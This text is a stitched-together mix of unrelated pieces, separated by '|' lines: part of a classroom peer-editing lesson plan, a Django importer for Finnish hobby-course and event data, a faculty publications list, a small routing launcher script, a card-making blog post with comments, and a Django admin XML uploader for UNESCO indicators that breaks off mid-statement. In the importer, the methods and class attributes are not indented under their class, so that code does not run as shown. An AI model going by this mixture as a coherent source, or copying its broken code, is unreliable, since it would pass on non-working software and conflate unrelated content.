"You will now have a short conversation with your assigned writing partner about what you want them to look for in your writing. Decide who will be partner A and who will be partner B. Partner A, I want to hear your say the following prompt; “I would like you to give me feedback on….” Partner B, listen to your partner and put a star on the part of the rubric that your partner has asked you to look for. Then switch.” I will check for understanding by asking every level of learner what they heard their partner say (at least 3 students-one who is at standard, one is approaching standard, and one who is above standard). I am listening to see that they really understood their partner and used the rubric language.
Closing of Active Engagement: I will say, “Remember in order to get another person’s opinion on my writing; I am going to practice the skill of getting a second opinion on my writing and the strategy of utilizing a peer editor. The process writer’s use is they give their draft to a peer and ask them to look for something specifically. They accept their partner’s feedback, but also use what they know about good writing.
Independent Practice: I will say, “Now you are going to read over your partner’s work. I should not hear talking, because if you do not understand a part of your partner’s writing, then write your questions on the rubric. Just like with real authors, if we don’t understand their stories, we can’t call them up and ask them. In order to thoroughly read their partner’s writing and leave comments for every part of the rubric, this should take at least 20 minutes. As they are working independently and quietly (I like to play classical or smooth jazz for “writing” music; I just create a play list on Pandora Internet radio), I will confer with them about their writing using the attached possible conferences for peer editing.”
Closing: For closing today I will do a whole class share out. I will ask the class, “What do you need to edit and revise for in your paper for homework tonight?” I will check for understanding by asking every level of learner what they heard their partner say (at least 3 students-one who is at standard, one is approaching standard, and one who is above standard). I will tell students that for homework they must edit and revise their papers based on their partner’s feedback. They must come tomorrow ready to write their published draft.
|
import logging
import traceback
from collections import namedtuple
from copy import deepcopy
from datetime import datetime, timedelta
from functools import lru_cache, partial
import pytz
import requests
from django.db import transaction
from django.utils.dateparse import parse_time
from django.utils.timezone import now
from django_orghierarchy.models import Organization
from events.importer.sync import ModelSyncher
from events.importer.util import clean_text
from events.importer.yso import KEYWORDS_TO_ADD_TO_AUDIENCE
from events.keywords import KeywordMatcher
from events.models import DataSource, Event, Keyword, Place
from .base import Importer, register_importer
# Per module logger
logger = logging.getLogger(__name__)
HARRASTUSHAKU_API_BASE_URL = 'http://nk.hel.fi/harrastushaku/api/'
TIMEZONE = pytz.timezone('Europe/Helsinki')
# Upper bound for a recurring course's total length.
MAX_RECURRING_EVENT_LENGTH = 366 # days
# Hardcoded YSO keyword ids applied per Harrastushaku main category id
# (see import_courses docstring below).
MAIN_CATEGORY_KEYWORDS = {
    '1': {'yso:p3466'},
    '2': {'yso:p916', 'yso:p6062'},
    '3': {'yso:p13084', 'yso:p2023'},
    '4': {'yso:p2445', 'yso:p20405'},
    '5': {'yso:p1808'},
    '7': {'yso:p2851'},
    '8': {'yso:p1278'},
    '9': {'yso:p6940'},
    '11': {'yso:p143', 'yso:p9270'},
}
# Audience keyword ids keyed by (min age, max age) ranges, used with the
# activity's "audience_min_age"/"audience_max_age" fields.
# NOTE(review): the exact range-matching semantics live in code not shown
# here — confirm before relying on these bounds.
AUDIENCE_BY_AGE_RANGE = (
    ((0, 6), {'yso:p4354'}),
    ((7, 16), {'yso:p16485'}),
    ((10, 18), {'yso:p11617'}),
)
# Start/end pair describing a single sub-event occurrence.
SubEventTimeRange = namedtuple('SubEventTimeRange', ['start', 'end'])
class HarrastushakuException(Exception):
    """Error raised when a single Harrastushaku location/activity cannot be handled."""
    pass
@register_importer
class HarrastushakuImporter(Importer):
name = 'harrastushaku'
supported_languages = ['fi']
def setup(self):
    """Create or load the data sources, organization and lookup caches the importer needs."""
    logger.debug('Running Harrastushaku importer setup...')
    self.data_source, _ = DataSource.objects.get_or_create(id=self.name, defaults={'name': 'Harrastushaku'})
    # Plain .get(): the tprek (Toimipisterekisteri) data source must already exist.
    self.tprek_data_source = DataSource.objects.get(id='tprek')
    self.ahjo_data_source, _ = DataSource.objects.get_or_create(id='ahjo', defaults={'name': 'Ahjo'})
    self.organization, _ = Organization.objects.get_or_create(origin_id='u48040030',
                                                              data_source=self.ahjo_data_source)
    # In-memory caches to avoid repeated database lookups while handling activities.
    self.tprek_ids = {place.origin_id for place in Place.objects.filter(data_source=self.tprek_data_source)}
    self.keywords = {keyword.id: keyword for keyword in Keyword.objects.all()}
    self.keyword_matcher = KeywordMatcher()
def import_places(self):
    """Import Harrastushaku locations as Places

    A location that matches an existing Toimipisterekisteri place closely
    enough is skipped, since importing it would duplicate the place (the
    Harrastushaku data is of low quality). Locations without a match are
    imported under the "harrastushaku" data source. A failure on one
    location is logged and does not stop the others.
    """
    logger.info('Importing places...')
    location_list = self.fetch_locations()
    logger.debug('Handling {} locations...'.format(len(location_list)))
    self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(location_list)
    for location_data in location_list:
        try:
            self.handle_location(location_data)
        except Exception as error:  # noqa
            if isinstance(error, HarrastushakuException):
                message = error
            else:
                message = traceback.format_exc()
            logger.error('Error handling location {}: {}'.format(location_data.get('id'), message))
def map_harrastushaku_location_ids_to_tprek_ids(self, harrastushaku_locations):
    '''
    Build a dict from Harrastushaku location id to the place id to use:
    a tprek place id when a strict (with name) or flexible (without name)
    address match is found, otherwise a "harrastushaku:<id>" id.

    Example mapped dictionary result:

    {
        '95': 'harrastushaku:95',
        '953': 'harrastushaku:953',
        '968': 'tprek:20479',
        '97': 'tprek:8062',
        '972': 'tprek:9079',
        '987': 'harrastushaku:987',
        '99': 'tprek:8064',
    }
    '''
    mapping = {}
    for location in harrastushaku_locations:
        location_id = location['id']
        # The flexible filters are the strict ones minus the name.
        flexible_filters = {
            'id__startswith': self.tprek_data_source,
            'address_locality': location['city'],
            'postal_code': location['zip'],
            'street_address': location['address'],
        }
        strict_filters = dict(flexible_filters, name=location['name'])
        tprek_place = (Place.objects.filter(**strict_filters).first() or
                       Place.objects.filter(**flexible_filters).first())
        if tprek_place:
            mapping[location_id] = tprek_place.id
        else:
            mapping[location_id] = '{}:{}'.format(self.data_source.id, location_id)
    return mapping
def import_courses(self):
    """Import Harrastushaku activities as Courses

    Activities having "active" anything else than "1" or "K" will be
    ignored.

    When importing and an existing course isn't present in imported data:
    - If the course's end time is in the past, the course will be left as
      it is.
    - If the course's end time is not in the past, the course will be soft
      deleted alongside its sub events.

    If an activity has something in field "timetables", it will be imported
    as a recurring event, otherwise as a one-time event.

    A recurring course will have a super event which includes the course's
    whole time period, and sub events which will represent individual course
    occurrences. Other than start and end times, a super event and its sub
    events will all contain the same data.

    A recurring course's sub event start and end datetimes will be build using
    the activity's "timetables". The time tables contain info out weekday,
    times, and repetition which means number of days there is between
    occurrences (basically a multiple of 7).

    A recurring course's sub events will be given an ID that has the
    activity's ID and start and end times of the sub event in a compressed
    form. This also means that between imports only sub events that are
    happening exactly at the same time are considered to be the same instance,
    so if a sub event's begin or end time changes at all, a new sub event will
    be created instead of updating an old one (because there is no unambiguous
    way to determine which old sub event the new one corresponds to).

    A course's keywords will come from both of the following:
    - The activity's main category. There are hardcoded keywords for every
      main category.
    - The activity's sub category's "searchwords". Those are manually
      entered words, which are mapped to keywords using KeywordMatcher
      (from events.keywords).

    A course's audience will come from both of the following:
    - The activity's "audience_max_age" and "audience_min_age" using
      hardcoded keywords for certain age ranges.
    - The course's keywords, adding the ones that are present in
      KEYWORDS_TO_ADD_TO_AUDIENCE (from events.importer.yso).
    """
    logger.info('Importing courses...')
    locations = self.fetch_locations()
    if not locations:
        logger.warning('No location data fetched, aborting course import.')
        return
    self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
    activities = self.fetch_courses()
    if not activities:
        logger.info('No activity data fetched.')
        return

    def event_delete(event):
        # Leave already-finished events untouched; soft delete the rest
        # together with their sub events.
        if event.end_time < now():
            return
        event.soft_delete()
        for sub_event in event.sub_events.all():
            sub_event.soft_delete()

    # Syncher over top-level (non-sub) events of this data source; events not
    # seen during this run are passed to event_delete.
    self.event_syncher = ModelSyncher(
        Event.objects.filter(data_source=self.data_source, super_event=None),
        lambda event: event.id,
        event_delete,
    )
    num_of_activities = len(activities)
    logger.debug('Handling {} activities...'.format(num_of_activities))
    for i, activity in enumerate(activities, 1):
        try:
            self.handle_activity(activity)
        except Exception as e:  # noqa
            # One bad activity must not abort the whole import run.
            message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
            logger.error('Error handling activity {}: {}'.format(activity.get('id'), message))
        if not i % 10:
            logger.debug('{} / {} activities handled.'.format(i, num_of_activities))
    # NOTE(review): force=True presumably drops unseen events without extra
    # checks — confirm against ModelSyncher.finish semantics.
    self.event_syncher.finish(force=True)
    logger.info('Course import finished.')
def fetch_locations(self):
    """Fetch all locations from the Harrastushaku API.

    Returns the parsed JSON payload, or an empty list when the request
    fails (the failure is logged).
    """
    logger.debug('Fetching locations...')
    url = '{}location/'.format(HARRASTUSHAKU_API_BASE_URL)
    try:
        response = requests.get(url)
        response.raise_for_status()
    except requests.RequestException as e:
        logger.error('Cannot fetch locations: {}'.format(e))
        return []
    return response.json()
def fetch_courses(self):
    """Fetch all activities (courses) from the Harrastushaku API.

    Returns the list under the payload's "data" key, or an empty list
    when the request fails (the failure is logged).
    """
    logger.debug('Fetching courses...')
    url = '{}activity/'.format(HARRASTUSHAKU_API_BASE_URL)
    try:
        response = requests.get(url)
        response.raise_for_status()
    except requests.RequestException as e:
        logger.error('Cannot fetch courses: {}'.format(e))
        return []
    return response.json()['data']
@transaction.atomic
def handle_location(self, location_data):
    """Import a single location.

    Locations already mapped to a TPRek place are skipped (they exist in
    the TPRek data source); everything else is saved as our own place.
    """
    harrastushaku_location_id = location_data.get('id')
    mapped_id = self.location_id_to_place_id.get(harrastushaku_location_id)
    # Guard against ids missing from the mapping: calling .startswith on
    # None would raise AttributeError. An unmapped location is by
    # definition not a TPRek place, so fall through and import it.
    if mapped_id and mapped_id.startswith(self.tprek_data_source.id):
        return
    self.handle_non_tprek_location(location_data)
def handle_non_tprek_location(self, location_data):
    """Save a Place in our own data source from raw location data."""
    get_string, _, _ = bind_data_getters(location_data)
    # Localized (Finnish) text fields, mapped from the API field names.
    localized = {
        'name': get_string('name', localized=True),
        'info_url': get_string('url', localized=True),
        'street_address': get_string('address', localized=True),
        'address_locality': get_string('city', localized=True),
    }
    place_data = dict(
        localized,
        postal_code=get_string('zip'),
        data_source=self.data_source,
        origin_id=location_data['id'],
        publisher=self.organization,
    )
    self.save_place(place_data)
@transaction.atomic
def handle_activity(self, activity_data):
    """Import a single activity as a recurring or one-time event.

    Activities whose "timetables" field is non-empty become recurring
    events; the rest become one-time events. Raises
    HarrastushakuException on inconsistent data.
    """
    if activity_data.get('active') not in ('1', 'K'):
        logger.debug('Skipping inactive activity {}'.format(activity_data.get('id')))
        return
    event_data = self.get_event_data(activity_data)
    start_time = event_data['start_time']
    end_time = event_data['end_time']
    # Only compare when both datetimes exist: comparing None would raise
    # TypeError instead of a clean, loggable import error. A missing time
    # is reported separately by handle_recurring_event.
    if start_time and end_time and start_time > end_time:
        raise HarrastushakuException('Start time after end time')
    time_tables = activity_data.get('timetables', [])
    if time_tables:
        self.handle_recurring_event(event_data, time_tables)
    else:
        self.handle_one_time_event(event_data)
def create_registration_links(self, activity_data):
    """Build the external registration link for an activity.

    Harrastushaku has its own registration pages which should be linked
    from the imported events as well. Returns
    ``{'fi': {'registration': url}}`` while registration is open,
    otherwise ``''``.
    """
    if activity_data.get('regavailable', 0) and '1' in activity_data['regavailable']:
        # regstartdate/regenddate sometimes hold JSON false, which seems to
        # mean (when regavailable == '1') that registration runs
        # indefinitely. bool is a subclass of int, so a plain
        # isinstance(value, int) check would accept False and collapse the
        # open-ended window to the epoch -- exclude bools explicitly.
        def _timestamp_or(value, default):
            if isinstance(value, int) and not isinstance(value, bool):
                return value
            return default
        reg_start = _timestamp_or(activity_data['regstartdate'], 0)
        reg_end = _timestamp_or(activity_data['regenddate'], 9999999999)
        if datetime.utcfromtimestamp(reg_start) <= datetime.utcnow() <= datetime.utcfromtimestamp(reg_end):
            return {'fi': {'registration': f"https://harrastushaku.fi/register/{activity_data['id']}"}}
    return ''
def get_event_data(self, activity_data):
    """Build the event data dict for one raw activity.

    Collects keywords, audience, location, images, offers and enrolment
    extension data via the sibling helpers and returns a dict in the
    shape expected by save_event().
    """
    get_string, get_int, get_datetime = bind_data_getters(activity_data)
    keywords = self.get_event_keywords(activity_data)
    # Audience is derived from the age limits plus the audience-eligible
    # keywords; every audience keyword is also added to the plain keywords.
    audience = self.get_event_audiences_from_ages(activity_data) | self.get_event_audiences_from_keywords(keywords)
    keywords |= audience
    event_data = {
        'name': get_string('name', localized=True),
        'description': get_string('description', localized=True),
        'audience_max_age': get_int('agemax'),
        'audience_min_age': get_int('agemin'),
        'start_time': get_datetime('startdate'),
        'end_time': get_datetime('enddate'),
        'date_published': get_datetime('publishdate'),
        'external_links': self.create_registration_links(activity_data),
        'organizer_info': self.get_organizer_info(activity_data),
        # Course-extension fields (enrolment window and capacities).
        'extension_course': {
            'enrolment_start_date': get_datetime('regstartdate'),
            'enrolment_end_date': get_datetime('regenddate'),
            'maximum_attendee_capacity': get_int('maxentries'),
            'remaining_attendee_capacity': get_int('regavailable'),
        },
        'data_source': self.data_source,
        'origin_id': activity_data['id'],
        'publisher': self.organization,
        'location': self.get_event_location(activity_data),
        'keywords': keywords,
        'in_language': self.get_event_languages(activity_data),
        'images': self.get_event_images(activity_data),
        'offers': self.get_event_offers(activity_data),
        'audience': audience,
    }
    return event_data
def handle_recurring_event(self, event_data, time_tables):
    """Save a recurring super event plus one sub event per occurrence.

    Raises HarrastushakuException when times are missing, the course is
    unreasonably long, or the time tables yield no occurrences.
    """
    start_date, end_date = self.get_event_start_and_end_dates(event_data)
    for date_value, message in ((start_date, 'No start time'), (end_date, 'No end time')):
        if not date_value:
            raise HarrastushakuException(message)
    if end_date - start_date > timedelta(days=MAX_RECURRING_EVENT_LENGTH):
        raise HarrastushakuException('Too long recurring activity')
    sub_event_time_ranges = self.build_sub_event_time_ranges(start_date, end_date, time_tables)
    if not sub_event_time_ranges:
        raise HarrastushakuException('Erroneous time tables: {}'.format(time_tables))
    super_event = self.save_super_event(event_data)
    self.save_sub_events(event_data, sub_event_time_ranges, super_event)
def handle_one_time_event(self, event_data):
    """Save the activity as a single event with date-only times."""
    event_data.update(has_start_time=False, has_end_time=False)
    saved_event = self.save_event(event_data)
    self.event_syncher.mark(saved_event)
def get_event_keywords(self, activity_data):
    """Collect keywords from main categories and search words."""
    from_categories = self.get_event_keywords_from_main_categories(activity_data)
    from_search_words = self.get_event_keywords_from_search_words(activity_data)
    return from_categories | from_search_words
def get_event_keywords_from_main_categories(self, activity_data):
    """Map the activity's main category ids to hardcoded keyword objects."""
    keyword_ids = set()
    for category in activity_data.get('categories', []):
        keyword_ids.update(MAIN_CATEGORY_KEYWORDS.get(category.get('maincategory_id'), set()))
    return {self.keywords[kw_id] for kw_id in keyword_ids if kw_id in self.keywords}
def get_event_keywords_from_search_words(self, activity_data):
    """Match the activity's comma-separated "searchwords" to keywords.

    Each search word is matched through self.match_keyword; unmatched
    words are ignored. Returns a set of keyword objects.
    """
    keywords = set()
    # The raw value is a comma-separated string. The previous list default
    # crashed on .split(',') whenever the field was missing; ``or ''``
    # also covers JSON null/false values.
    search_words = activity_data.get('searchwords') or ''
    cleaned_search_words = [s.strip().lower() for s in search_words.split(',') if s.strip()]
    for kw in cleaned_search_words:
        matches = self.match_keyword(kw)
        if matches:
            keywords |= set(matches)
    return keywords
def get_event_languages(self, activity_data):
    """Return language objects whose Finnish name appears in the raw text."""
    language_text = activity_data.get('languages', '').lower()
    found = set()
    for language in self.languages.values():
        if language.name_fi and language.name_fi in language_text:
            found.add(language)
    return found
def get_event_start_and_end_dates(self, event_data):
    """Return the date parts of start/end datetimes (None when missing)."""
    dates = []
    for key in ('start_time', 'end_time'):
        value = event_data.get(key)
        dates.append(value.date() if value else None)
    return tuple(dates)
def get_organizer_info(self, activity_data):
    """Combine registration and organiser details into one localized string.

    Returns ``{'fi': text}`` when either detail exists, otherwise ``''``.
    """
    reg_details = clean_text(activity_data.get('regdetails', ''), strip_newlines=True, parse_html=True)
    org_details = clean_text(activity_data.get('organiserdetails', ''), strip_newlines=True, parse_html=True)
    if not (org_details or reg_details):
        return ''
    return {'fi': f'{reg_details} {org_details}'.strip()}
def build_sub_event_time_ranges(self, start_date, end_date, time_tables):
    """Build the (start, end) datetime ranges of every course occurrence.

    Each time table entry provides an ISO weekday, start/end times and a
    repetition interval in days. Invalid entries (weekday 0/missing or a
    non-positive time span) are skipped. Returns a list of
    SubEventTimeRange, possibly empty.
    """
    sub_event_time_ranges = []
    for time_table in time_tables:
        current_date = start_date
        weekday = int(time_table.get('weekday'))
        start_time = parse_time(time_table.get('starttime'))
        end_time = parse_time(time_table.get('endtime'))
        repetition = int(time_table.get('repetition'))
        if repetition == 0:
            repetition = 7  # assume repetition 0 and 7 mean the same thing
        if not (weekday and repetition) or start_time >= end_time:
            continue
        # Advance to the entry's first occurrence (isoweekday: Mon=1..Sun=7).
        while current_date.isoweekday() != weekday:
            current_date += timedelta(days=1)
        while current_date <= end_date:
            sub_event_time_ranges.append(SubEventTimeRange(
                # NOTE(review): datetime.combine() yields a naive datetime,
                # so astimezone() interprets it in the server's local
                # timezone before converting to TIMEZONE -- confirm this
                # matches the intended semantics on the deployment host.
                datetime.combine(current_date, start_time).astimezone(TIMEZONE),
                datetime.combine(current_date, end_time).astimezone(TIMEZONE),
            ))
            current_date += timedelta(days=repetition)
    return sub_event_time_ranges
def save_super_event(self, event_data):
    """Save a copy of the event data as a RECURRING super event."""
    data = dict(deepcopy(event_data), super_event_type=Event.SuperEventType.RECURRING)
    saved_event = self.save_event(data)
    self.event_syncher.mark(saved_event)
    return saved_event
def save_sub_events(self, event_data, sub_event_time_ranges, super_event):
    """Sync the super event's sub events against the given time ranges.

    Creates/updates one sub event per time range, soft-deletes sub events
    that no longer occur, and re-saves the super event when anything
    underneath it changed.
    """
    super_event._changed = False

    def delete_sub_event(obj):
        # Soft delete: flag the row instead of removing it.
        logger.debug('{} deleted'.format(obj))
        obj.deleted = True
        obj.save()

    # The syncher deletes previously imported sub events not marked below.
    sub_event_syncher = ModelSyncher(
        super_event.sub_events.filter(deleted=False), lambda o: o.id, delete_func=delete_sub_event)
    sub_event_data = deepcopy(event_data)
    sub_event_data['super_event'] = super_event
    for sub_event_time_range in sub_event_time_ranges:
        sub_event_data['start_time'] = sub_event_time_range.start
        sub_event_data['end_time'] = sub_event_time_range.end
        # Identity includes the exact times, so an occurrence whose time
        # changes becomes a new sub event rather than an update.
        sub_event_data['origin_id'] = (
            event_data['origin_id'] + self.create_sub_event_origin_id_suffix(sub_event_time_range))
        sub_event = self.save_event(sub_event_data)
        if sub_event._changed:
            super_event._changed = True
        sub_event_syncher.mark(sub_event)
    # A change in the number of sub events also counts as a change.
    old_sub_event_count = super_event.sub_events.count()
    sub_event_syncher.finish(force=True)
    if super_event.sub_events.count() != old_sub_event_count:
        super_event._changed = True
    if super_event._changed:
        super_event.save()
def create_sub_event_origin_id_suffix(self, sub_event_time_range):
    """Build the "_YYYYMMDDHHMMHHMM" origin id suffix for a sub event."""
    start, end = sub_event_time_range
    assert start.date() == end.date()
    return '_{}{}{}'.format(
        start.strftime('%Y%m%d'),
        start.strftime('%H%M'),
        end.strftime('%H%M'),
    )
def get_event_images(self, activity_data):
    """Build name/url image dicts from the activity's image mapping."""
    images = activity_data.get('images')
    if not isinstance(images, dict):
        return []
    return [
        {'name': image.get('name', ''), 'url': image.get('filename', '')}
        for image in images.values()
    ]
def get_event_location(self, activity_data):
    """Resolve the activity's location id to a place reference, if any."""
    location_id = activity_data.get('location_id')
    if location_id:
        return {'id': self.location_id_to_place_id.get(location_id)}
    return None
def get_event_offers(self, activity_data):
    """Build offer dicts (price, is_free, description) from price entries."""
    offers = []
    for price_data in activity_data.get('prices', ()):
        get_string = bind_data_getters(price_data)[0]
        price = get_string('price', localized=False)
        description = get_string('description', localized=True)
        is_free = price is not None and price == '0'
        # A lone price entry may carry its text in "pricedetails" instead.
        if not description and len(activity_data['prices']) == 1:
            description = get_string('pricedetails', localized=True)
        offers.append({
            'price': None if is_free else price,
            'is_free': is_free,
            'description': description,
        })
    return offers
def get_event_audiences_from_ages(self, activity_data):
    """Map the activity's age range to hardcoded audience keywords."""
    age_min = get_int_from_data(activity_data, 'agemin') or 0
    age_max = get_int_from_data(activity_data, 'agemax') or 200
    matching_ids = set()
    for (range_min, range_max), keyword_ids in ((r, k) for r, k in AUDIENCE_BY_AGE_RANGE):
        if ranges_overlap(age_min, age_max, range_min, range_max):
            matching_ids |= keyword_ids
    return {self.keywords[k_id] for k_id in matching_ids if k_id in self.keywords}
def get_event_audiences_from_keywords(self, keywords):
    """Pick the keywords that also count as audience keywords."""
    return {keyword for keyword in keywords if keyword.id in KEYWORDS_TO_ADD_TO_AUDIENCE}
def match_keyword(self, text):
    """Match free text to keywords via the keyword matcher, with caching.

    Replaces ``functools.lru_cache`` on the method: lru_cache keys on
    ``self`` and therefore keeps every importer instance alive for the
    lifetime of the cache. A per-instance dict gives the same speed-up
    without the leak and dies with the instance.
    """
    cache = self.__dict__.setdefault('_match_keyword_cache', {})
    if text not in cache:
        cache[text] = self.keyword_matcher.match(text)
    return cache[text]
def get_string_from_data(data, field, localized=False):
    """Read a cleaned string field from *data*.

    Returns None for missing/non-string/blank values. With ``localized``
    the value is wrapped as ``{'fi': value}``.
    """
    raw = data.get(field)
    if not isinstance(raw, str):
        return None
    cleaned = clean_text(raw)
    if not cleaned:
        return None
    if localized:
        return {'fi': cleaned}
    return cleaned
def get_int_from_data(data, field):
    """Read *field* from *data* as an int, or None when absent/blank.

    Note: the membership test uses ``==``, so ``0`` matches ``False`` and
    is also treated as missing -- presumably mirroring the API's use of
    false/"" placeholders (confirm against the upstream data).
    """
    value = data.get(field)
    return None if value in (None, False, '') else int(value)
def get_datetime_from_data(data, field):
    """Read a unix-timestamp field and return it as a datetime in TIMEZONE.

    Returns None when the value is absent/blank (``0`` also matches
    ``False`` in the membership test and is treated as missing).
    """
    value = data.get(field)
    if value in (None, False, ''):
        return None
    as_utc = datetime.utcfromtimestamp(int(value)).replace(tzinfo=pytz.utc)
    return as_utc.astimezone(TIMEZONE)
def bind_data_getters(data):
    """Return (get_string, get_int, get_datetime) pre-bound to *data*."""
    return (
        partial(get_string_from_data, data),
        partial(get_int_from_data, data),
        partial(get_datetime_from_data, data),
    )
def ranges_overlap(x1, x2, y1, y2):
    """Return True when the closed ranges [x1, x2] and [y1, y2] intersect."""
    return not (x2 < y1 or y2 < x1)
|
Craig McLauchlan and Marjorie Jones, CHE, co-authored “An Additional Method for Analyzing the Reversible Inhibition of an Enzyme” for Current Enzyme Inhibition.
Timothy Lash and Gregory Ferrence, CHE, co-authored “adj-Dicarbachlorin, the First Example of a Free Base Carbaporphyrinoid System with an Internal Methylene Unit,” in Chemical Communications.
William Bohn, LAN emeritus, published an article titled “Apollinaire d’un port a l’autre” in Apollinaire: Revue d’Etudes Apollinariennes.
T.Y. Wang, POL, presented a co-authored paper titled “Taiwan Citizens’ Views of China: What Are the Effects of Cross-Strait Contacts?” at A New Era in Taiwan: Domestic and International Implications, a conference at the University of Texas at Austin.
Julie Schumacher, FCS, and Jackie Lanier, HSC, presented “Best-Practice Grant Writing Strategies of Registered Dietitian Nutritionists to Establish and Support Community Coalitions,” at the National Food & Nutrition Conference and Expo for the Academy of Nutrition and Dietetics in Nashville, Tennessee.
Susan Burt, ENG, presented “Person-Referring Expressions, Reference Nominals, and Address Nominals: Explorations in a Small Local Corpus” at the Third International Conference of the International Network on Address Research, at Texas A&M University, College Station, Texas.
Angela Haas, ENG, presented “Toward a Decolonial Feminist Operating System for Digital Rhetoric Studies” at the Feminisms & Rhetorics Conference at Arizona State University.
|
# wrouted.py
#
# Copyright (C) 2013 Yi-Wei Ci <ciyiwei@hotmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from poller import WRoutePoller
from worker import WRouteWorker
import sys
sys.path.append('../../lib')
from default import WROUTE_ROLE
if __name__ == '__main__':
    # WROUTE_ROLE selects which components run on this node. Inferred from
    # the checks below: 0 -> poller only, 1 -> worker only, any other
    # value -> both. Confirm against the docs for default.WROUTE_ROLE.
    if WROUTE_ROLE != 1:
        poller = WRoutePoller()
        poller.run()
    if WROUTE_ROLE != 0:
        worker = WRouteWorker()
        worker.start()
        worker.join()
    if WROUTE_ROLE != 1:
        # Wait for the poller after the worker (if any) has finished.
        poller.join()
|
I think Blogger is still having problems. For some reason it will only display one post at a time on my front page. You will have to click on Older Posts to see the rest of my posts for now, unless publishing this post corrects the problem. I also think they are hard to get in contact with when asking about problems, but since they are free I can't complain too much.
Onto the card above. The sketch is straightforward; I didn't veer. The challenge at Our Creative Corner takes a little bit of explanation. The girls over there really keep us creating outside our boxes.
OOPS! Look at the time--off to finish the rest of the day. My Mom says she needs a Taco Bell fix, so we'll have dinner in her room and visit til she goes to bed. July 12th is the target date for her to come home from the nursing home. She has really made major improvements in the last month. Thanks for all the prayers and well wishes you've sent my way during the last 3 months.
Pick up a subscription while you are there, check out the challenges in the back and how to get published — and we may see you too in a future issue.
Supplies: 4" X 5 1/2" Soft Suede card blank, Papers: SU-Soft Suede, Regal Rose, Rich Razzleberry, Designer Series Paper Paisley Petals, Naturals White, Stamps: SU-Build a Blossom, So Happy for You, Ink: SU-Regal Rose, Rich Razzleberry, Baja Breeze, Fiskars corner rounder, SU punches-Scallop Trim, Ex.Lg. Blossom Petals, 1/2" circle, ribbon unknown, glue dots.
This is a beautiful card, love the flower. And it is very good news about your Mum. All the best.
Congrats on being featured AND published, and Blogger is letting more than one post show at a time so fantastic news all around LOL!
Great colors! Bold and beautiful.
Great love that big flower. Glad you joined us at cardpatterns.
|
import xml.etree.cElementTree as etree
from django.contrib import admin
from django.shortcuts import get_object_or_404
from multiupload.admin import MultiUploadAdmin
from indicator.upload_indicators_helper import find_country, find_city, get_countries, get_cities, get_value, save_log, save_city_data, save_country_data
from indicator_unesco.models import UnescoIndicatorData, UnescoIndicator
from translation_model.models import TranslationModel
class UnescoIndicatorDataUploadAdmin(MultiUploadAdmin):
    """Admin for UnescoIndicatorData with multi-file XML upload support.

    Uploaded XML documents are parsed into UnescoIndicator /
    UnescoIndicatorData rows plus English/French translations, and an
    upload log is saved for each file.
    """
    list_display = ['unesco_indicator','country', 'value']
    search_fields = ['unesco_indicator']
    list_filter = ['unesco_indicator', 'country']
    # default value of all parameters:
    change_form_template = 'multiupload/change_form.html'
    change_list_template = 'multiupload/change_list.html'
    multiupload_template = 'multiupload/upload_unesco.html'
    # if true, enable multiupload on list screen
    # generaly used when the model is the uploaded element
    multiupload_list = True
    # if true enable multiupload on edit screen
    # generaly used when the model is a container for uploaded files
    # eg: gallery
    # can upload files direct inside a gallery.
    multiupload_form = True
    # max allowed filesize for uploads in bytes
    multiupload_maxfilesize = 3 * 2 ** 20 # 3 Mb
    # min allowed filesize for uploads in bytes
    multiupload_minfilesize = 0
    # tuple with mimetype accepted
    multiupload_acceptedformats = ("text/xml",)
    def process_uploaded_file(self, uploaded, object,request, **kwargs):
        '''
        This method will be called for every XML file uploaded.
        Parameters:
            :uploaded: instance of uploaded file
            :object: instance of object if in form_multiupload else None
            :kwargs: request.POST received with file
        Return:
            It MUST return at least a dict with:
            {
                'url': 'url to download the file',
                'thumbnail_url': 'some url for an image_thumbnail or icon',
                'id': 'id of instance created in this method',
                'name': 'the name of created file',
            }
        '''
        line_counter = 0
        country_found = []
        country_not_found = []
        total_items_saved = 0
        countries = get_countries()
        #getting the title of the file
        title = kwargs.get('title', [''])[0] or uploaded.name
        xmlDoc = uploaded
        xmlDocData = xmlDoc.read()
        xmlDocTree = etree.XML(xmlDocData)
        for indicator in xmlDocTree.iter('CountryId'):
            # NOTE(review): children are addressed by position -- this
            # assumes the element order is (country name, name_en, name_fr,
            # value, [website_en, website_fr]); confirm against the XML
            # schema of the uploaded documents.
            indicator_name_en = indicator[1].text.rstrip()
            indicator_name_fr = indicator[2].text.rstrip()
            indicator_country = indicator[0].text.rstrip()
            country_iso = indicator.get('countryid').rstrip()
            value = indicator[3].text.rstrip()
            type_value = None
            try:
                website_en = indicator[4].text.rstrip()
                website_fr = indicator[5].text.rstrip()
            except IndexError:
                # Website elements are optional.
                website_en = None
                website_fr = None
            #try to find the indicator that is uploaded or create a new one
            indicator_from_db = UnescoIndicator.objects.get_or_create(id=indicator_name_en)[0]
            #getting country from our database
            country_from_db = find_country(country_name=indicator_country, countries=countries, iso2=country_iso)
            #add country to the log array
            if country_from_db:
                country_found.append(indicator_country)
            else:
                if indicator_country:
                    country_not_found.append(indicator_country)
            #saving the unesco indicator data
            if country_from_db:
                indicator_data_from_db = UnescoIndicatorData.objects.get_or_create(unesco_indicator=indicator_from_db, country=country_from_db, value=value)[0]
                #storing the translation of the indicator
                TranslationModel.objects.get_or_create(key=indicator_name_en, language='en', translation=indicator_name_en)
                TranslationModel.objects.get_or_create(key=indicator_name_en, language='fr', translation=indicator_name_fr)
                if website_en:
                    indicator_data_from_db.website = website_en
                    indicator_data_from_db.save()
                    #we need to store the translations as well
                    TranslationModel.objects.get_or_create(key=website_en, language='en', translation=website_en)
                    TranslationModel.objects.get_or_create(key=website_en, language='fr', translation=website_fr)
                total_items_saved += 1
            line_counter += 1
        # Persist an upload log; city fields are unused for this importer.
        log = save_log(file=uploaded,
                       uploaded_by_user=request.user,
                       cities_not_found=[],
